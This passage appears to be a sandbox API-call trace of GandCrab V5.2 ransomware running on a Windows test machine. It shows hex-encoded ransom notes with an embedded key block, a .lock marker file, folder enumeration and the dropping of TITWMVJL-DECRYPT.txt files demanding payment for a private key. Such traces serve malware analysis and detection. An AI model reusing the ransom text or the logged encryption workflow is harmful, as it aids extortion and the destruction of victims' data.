x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0095.096] WriteFile (in: hFile=0x230, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f508, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f508*=0x2162, lpOverlapped=0x0) returned 1 [0095.097] CloseHandle (hObject=0x230) returned 1 [0095.097] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.097] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.097] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x28, wMilliseconds=0x1a0)) [0095.097] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.097] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0095.097] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0095.098] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\SendTo\\d2ca4a09d2ca4deb61a.lock") returned 53 [0095.098] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\SendTo\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\sendto\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0095.098] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.098] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.099] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\SendTo\\") returned 29 [0095.099] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\SendTo\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\SendTo\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\SendTo\\*" [0095.099] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\SendTo\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0xffffffff [0095.099] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\SendTo\\*", lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0xffffffff [0095.099] CloseHandle (hObject=0x230) returned 1 [0095.099] FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0095.099] lstrcmpW (lpString1="Start Menu", lpString2=".") returned 1 [0095.099] lstrcmpW (lpString1="Start Menu", lpString2="..") returned 1 [0095.099] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="Start Menu" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Start Menu") returned="C:\\Users\\CIiHmnxMn6Ps\\Start Menu" [0095.099] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Start Menu", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Start Menu\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Start Menu\\" [0095.099] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0095.099] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.100] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0095.100] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.100] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0095.100] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.100] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0095.100] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.100] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0095.100] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.100] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.100] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Start Menu\\\\TITWMVJL-DECRYPT.txt") returned 54 [0095.101] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Start Menu\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\start menu\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0095.102] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x